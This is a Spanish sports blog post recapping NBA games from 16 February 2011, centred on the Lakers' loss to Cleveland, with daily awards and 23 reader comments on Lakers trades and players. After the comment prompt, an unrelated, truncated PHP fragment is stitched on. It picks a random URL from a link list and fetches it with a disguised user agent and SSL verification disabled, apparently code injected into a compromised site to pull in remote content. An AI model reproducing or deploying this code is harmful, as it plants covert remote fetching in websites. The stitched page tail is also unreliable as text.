La Crónica (16/02/2011)

17 de February de 2011 por TheDeerHunter

¡Qué larga se está haciendo esta última gira por el Este a los Lakers! Si contra los Bobcats el propio Phil Jackson hablaba de decepción y vergüenza suponemos que anoche en la derrota contra los Cavs se le terminaron los calificativos (99-104). El equipo está fundido y ya no causan efecto ni las amenazas de revolución de Mitch Kupchak, ni las reprimendas públicas de Jackson, ni las llamadas a cerrar filas de Kobe o Gasol. Nadie sabe ya si es actitud, cansancio o simplemente calidad real de la plantilla. Algo huele a podrido en L.A. cuando Pau registra un 30-20 mientras Kobe hace un 30% en un capazo de tiros y de pérdidas y los focos de los resúmenes parecen apuntar al español como culpable. Si queríamos saber si lo de Kupchak iba en serio probablemente este será el mejor momento para verificarlo.

Más doloroso resulta para ellos mirar a los que a priori iban a ser sus máximos rivales y es que todos ganaron con mucha solvencia. Los Magic destrozaron a los Wizards (76-101), Bosh destacó en la victoria de Miami a su ex-equipo en Toronto (103-95) y los Celtics ganaron sobrados a New Jersey (80-94).

Los Hawks por su parte cayeron en el Madison (90-102), a pesar del gran momento por el que está pasando Mike Bibby. Los Pacers fueron doblegados por los Pistons tras una prórroga y una apasonante duelo Granger vs Prince (109-115) y cerrando la lucha de playoffs en el Este, los Sixers asaltaron el Toyota Center de Houston (114-105), a pesar del buen hacer de Scola y Lowry.

En el Oeste, los Blazers continúan con paso firme tomando aire tras los tropiezos de sus rivales más directos. Ayer lograron su 6ª victoria consecutiva ante otro equipo de montaña rusa (96-103) en uno de los peores partidos en la carrera de Chris Paul. Además, les vino bien la nueva derrota de los Jazz, ésta contra los Warriors de un Monta Ellis sembrado (107-100). Los Nuggets, por su parte, lograron aguantar el tipo contra los Bucks gracias a la ayuda de Carmelo y a pesar del inmenso partido de Salmons (94-87). Jennings y Bogut están desconocidos… de malos.

Los Mavs ganaron bien a Sacramento, con 5 de sus reservas en dobles figuras recuperando a un gran Beaubois (100-116). Finalmente en el duelo de sensaciones de la temporada Griffin le ganó la partida a Love, aunque ambos estuvieron algo más comedidos de lo que nos habían llegado a acostumbrar (98-90).

PREMIOS

MVP: Últimamente los Nuggers necesitan de grandes partidos de Carmelo Anthony para ganar. Anoche el ex de Syracuse tuvo que anotar 38 puntos y coger 12 rebotes para poder imponerse a los Bucks. ¿En qué situación quedarían los Nuggets si traspasan a Carmelo y Billups?¿Tendrían mejor o peor equipo que los Cavs?

Rookie: ¡Milagro, milagro! Blake Griffin no consiguió un doble-doble en su enfrentamiento contra Kevin Love. Aún así se fue a los 29 puntos, 8 rebotes y 5 asistencias. Por su parte, John Wall se fue a los 27 puntos y 5 asistencias.

Sorpresa: Podía también llevarse el premio de mayor esfuerzo en vano del día, pero ante todo, los 36 puntos, 4 rebotes y 7 asistencias de Kyle Lowry constituyen toda una sorpresa. Aaron Brooks tiene difícil volver a la titularidad.

Decepción: La pareja Josh Howard-Cartier Martin colaboró de forma importante en la paliza que recibió su equipo frente los Magic con un 3 de 23 en tiros de campo, Chase Budinger no fue capaz de anotar ninguno de sus 6 lanzamientos a canasta, Brandon Jennings sólo anotó 1 de 11… Cualquiera de estos jugadores se podría llevar el premio pero, sin duda, hoy toca otorgárselo a Los Angeles Lakers, el primer equipo campeón que cae ante un equipo capaz de perder 26 partidos seguidos.

Esfuerzo en vano: En la vergüenza amarilla, Pau Gasol fue el único que dio realmente la cara. Su mastodóntica actuación de 30 puntos y 20 rebotes (con un 14 de 14 en tiros libres incluído) no sirvió para llevarse la victoria ante el peor equipo de la NBA.

Imágenes | AP Photos / Getty Images

Comenta

23 comentarios a esta entrada

  1. Busky23 dice:
    #1

    En una jornada donde ha habido muchas buenas actuaciones es curioso el ver que los lideres en puntos,rebotes,asistencias y valoración han sido jugadores europeos.
    Prefiero obviar el tema Lakers,solo espero algún trade antes del cierre,esto empieza a ser bastante esperpéntico.
    Terceros en el Oeste con los Thunder pisandoles los talones.
    Sin hacer mucho ruido los Sixers ya se han colado séptimos y tienen a los Knicks a tiro de piedra,muy sólidos en este 2011.
    Portland suma y sigue,apuntalando esa quinta plaza del Oeste ante un rival directo,con un quinteto+ Rudy,tremendo. Y mientras los Hornets buscando un anotador desesperadamente ( Jr.Smith-Antawn Jamison y la más probable,Troy Murphy que llegaría libre y cobrando el mínimo).
    En Utah ya se va hasta la luz…ya me veo a Hornacek arrodillándose ante Sloan suplicandole su vuelta…
    Kevin Love a 2 partidos de igualar a Moses Malone en dobles dobles  consecutivos,eso es regularidad,si señor.

      Citar

  2. HisRoyalAirness dice:
    #2

    Lo de los Lakers me parece incomprensible; creo que Pau-Odom-Bynum son el mejor grupo de pivots de la liga y que Kobe es el mejor jugador de la NBA. Qué pasa entonces? De verdad que lo único que podría ser positivo sería algo de sangre fresca en el puesto de Fisher y Artest que se motive o a la puta calle. Cuándo vuelve Barnes?

      Citar

  3. Denise dice:
    #3

    Simplemente vergonzoso lo de Lakers. De las mayores verguenzas que recuerdo, el actual campeón perdiendo en una cancha donde gana todo el mundo y ante el peor equipo NBA de los ultimos tiempos.
    El problema de L.A. no es de calidad, es de actitud y concentración
    Artest ha conseguido su anillo y pasa un poco de todo, al menos de la regular season, quizas despierte en playoffs, si Barnes vuelve bien, él debe ser el titular como llevo diciendo desde siempre.
    Que un center se marque un 2-12 solo lo achaco a falta de concentración, y nuevamente vimos la versión
    chupóctera de Kobe.

      Citar

  4. GreenPride dice:
    #4

    Muy sorprendente lo de los Lakers, parecen estar muy faltos de fuerzas. Tampoco hay que salirse de madre y recordar que los Celtics también perdieron en The Q ante los Cavs aunque fue a principio de temporada. Si creo que es preocupante los bajones que sufren los Lakers en los partidos. Da la impresión de que creen que acabarán ganando pero ya se ve que se equivocan. Esta claro que esto les va a costar no tener la ventaja campo contra los grandes de la liga en playoffs y veremos si llegado el momento de la verdad tienen coraje para sacar las eliminatorias con el factor cancha en contra estilo Celtics del año pasado o bien se confirma que este equipo ha perdido el hambre y las ganas para poder ganar el anillo. ¿Un trade? El problema es a quién intercambias en un equipo campeón. Si Kobe, Gasol, Bynum, Odom son intocables como creo que lo son ¿Habrá alguien que pique y dé algo en condiciones por Artest? Yo lo veo difícil y no creo que Kupchack decida dar un bolantazo y traspasar a uno de los 4 intocables.

      Citar

  5. Txusma dice:
    #5

    A Artest no se lo traga nadie ahora mismo a no ser que venga acompañado de Bynum, por ejemplo.

    – Artest + Bynum x Carmelo Anthony?
    – Artest + Bynum x Gerald Wallace + Nazr Mohameed?
    – Artest + Bynum x Kirilenko?

      Citar

  6. gabrielj dice:
    #6

    Artest ha dicho en su Twitter que se le apareció Jesus y le dijo que a pesar de ser el peor jugador de la historia le seguía queriendo

    este tío ya esta de vuelta y media, yo no contaría con que diera mucho de si en lo que le queda de temporada

      Citar

  7. M dice:
    #7

    Los equipos de la Oeste son más fuertes, me parece, para andar haciendo tanto el canelo…y no se trata de dejarse llevar, como hicieron los Celtics, se trata de que no juegan bien, y están desgastándose mcho, además.

      Citar

  8. HisRoyalAirness dice:
    #8

    A mí desprenderse de Bynum me parecería algo de lo que arrepentirse…

      Citar

  9. Txusma dice:
    #9

    Las rodillas de Bynum no parecen ser muy seguras. Nadie duda de su calidad pero la puede aportar más de 50 partidos al año? Cada año habrá q estar en ascuas para ver si llega realmente sano a los Playoffs?

      Citar

  10. Busky23 dice:
    #10

    Bynum para mi no es intocable,incluso Odom diría que tampoco. Artest estoy seguro que se lo quieren sacar de encima pero nadie pica,Blake tiene a directiva y aficionados muy decepcionados,los rookies no cuentan para nada,Fisher es el peor base titular de la liga,Theo Ratliff missing,unido a la desidia y falta de motivación en gran parte de la plantilla da como resultado lo que estamos viendo,un equipo tremendamente irregular que puede perder con cualquier equipo,incluso con los patéticos Cavs.
    Algo tendrán que hacer los de arriba,las señales que está dando el equipo no son nada alentadoras,no se puede excusar todo en que en tiempo de playoffs todos estarán “más enchufados”

      Citar

  11. Scriers dice:
    #11

    Vaya con el resumencito de la nba. Es que se han cebado con Pau en los dos únicos balones que falla. ¿Por qué será? Y encima Kobe sale tirando triples y enchufando. ¡¡¡Por Dios!!! No es chovinismo, es… realidad. Cojones, informar como tiene que ser.
    Salvando eso, yo creo que se debería pasar a la accción. Artest está mal, pues fuera, Blake está nulo, pues Brown más minutos y que la lleve palante Odom o Kobe. Bynum sigue que no se entera, pues un Rookie. Sin coña, un Rookie. Aunque Bynum no es el más malo desde luego.

    Y madre mía Lowry, quién lo diría. Ahora, el problema en Houston es tener a Martin, Lowry y Brooks, que son jugadores que necesitan muchos tiros y muchos minutos. ¿Trade a la vista?

      Citar

  12. Jose Luis dice:
    #12

    Por más que digais de Bryant, tiene la 2ª mejor estadística +/- del partido, con +5 (seguida del +9 de Steve Blake). Esto quiere decir que si solo contara el tiempo que estuvo él en pista, los Lakers hubieran ganado de 5 el partido. Quizá fallara mucho, pero hace jugar, y atrae a las defensas. Aún así, muy mal los Lakers, fuera de casa hay que ganar el 1er y el 3er cuarto si o si, o al menos que los rivales no se despeguen mucho. Creo que a Dallas les alcanzarán, pero tienen factor cancha perdido seguro con Spurs, Boston, Miami y quizá Chicago

      Citar

  13. M dice:
    #13

    Esa estadística no es muy fiable, creo, como demuestra el hecho de que Blake esté por delante de Bryant en ella. No le niego categoría (¿cómo podría?) pero en los partidos en que se pone en modo salvapatrias me desquicia…

      Citar

  14. Jsp dice:
    #14

    Muchas noches seguidas sembradas de Ellis me parece no? no le vais a nombrar ni siquiera para el mvp? O cuando hicisteis el recuento os sorprendio que fuera el 4 y no lo volvereis a nombrar?

    Saludos

      Citar

  15. Denise dice:
    #15

    Lo de la estadistica + y – no vale para nada en mi opinión.
    Matt Barnes vuelve en 2 semanas, segun dice via twitter
    La cuestión no es echar a Bynum, es ¿y a quien traes en su lugar?, Bynum medio cojo al 50% es mejor que el 90% de centers de la NBA, ¿llamas a Orlando a ver si te dejan a Howard?, para mí sería un grave error traspasarlo. Reitero mi opinión de hace 2 semanas, a L.A. no le hace falta ningun trade, solo una buena bronca y mejorar el ambiente. Si acaso iría a por un 1-2 tirador (tipo Daniel Gibson) pero ofreciendo solo rondas de draft o los rookies.

    McMillan debería ser nombrado Entrenador del Año.

      Citar

  16. luigi_sal dice:
    #16

    si tuvisteis intención de ver el partido de ellis, hay una 2+1 en el último cuarto de lo q mejor q he visto en bastante tiempo, casi desde el triple. aunq el rey en eso sea jamal crawford, jeje. ya en serio, espero q suns y grizzlies se metan en playoffs por hornets y jazz. un poco de alegría!

      Citar

  17. HisRoyalAirness dice:
    #17

    De acuerdo con Denise al 100 por 100. Si hay que hacer algo es traer un guard que sea buen tirador pero sin desprenderse de ninguno de los grandes ni Kobe. Sino mejor quedarse como están

      Citar

  18. Txusma dice:
    #18

    A Artest lo consideráis entre los grandes? Sinceramente, para lo que necesitan los Lakers a los bases Steve Blake me parecía de las mejores opciones. Otra cosa es q esté pasando por una mala racha.

      Citar

  19. HisRoyalAirness dice:
    #19

    Yo creo que Artest en PO se motiva. El día de la victoria contra los Celtics Pierce no hizo nada en el primer tiempo, todo gracias a él. Si aguantarle todo el año implica que deje a Durant en un 30% en tiros de campo en una serie puede merecer la pena.

      Citar

  20. Denise dice:
    #20

    Respecto a Artest, al margen de su actitud, lo veo fuera de forma, lento, fofo y gordo, vamos, que le pesa el culo. Nunca ha sido el Correcaminos, ni Carter machacando, pero en los contraataques tarda un mundo en cruzar la cancha, y cuando va a machacar practicamente ni llega, siempre me da la sensación que al saltar no se va a agarrar bien al aro y se va a dar un guarrazo de espaldas.

      Citar

  21. HisRoyalAirness dice:
    #21

    No Denise, no es que practicamente no llegue a machacar, es que NO LLEGA. El tipo decía que este año había perdido peso para ser más ligero y defender a jugadores más ágiles pero es cierto que se le ve lento.

    Yo me guío sólo por una cosa: mi confianza absoluta en el Zen Master. Siempre sabe lo que hace.

      Citar

  22. Scriers dice:
    #22

    Yo también veo a Artest y siento que le pesa el culo. Cuando veo los partidos digo, madre mía, este tío que va tan a camara lenta…? Y es Artest. A mi también me ha sorprendido el rendimiento de Blake, que raro verlo hacerlo tan mal. No discreto sino mal directamente.

      Citar

  23. Txusma dice:
    #23

    Pero ojito, que Artest tiene 4 años más de contrato cobrando unos 7 kilos por temporada…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>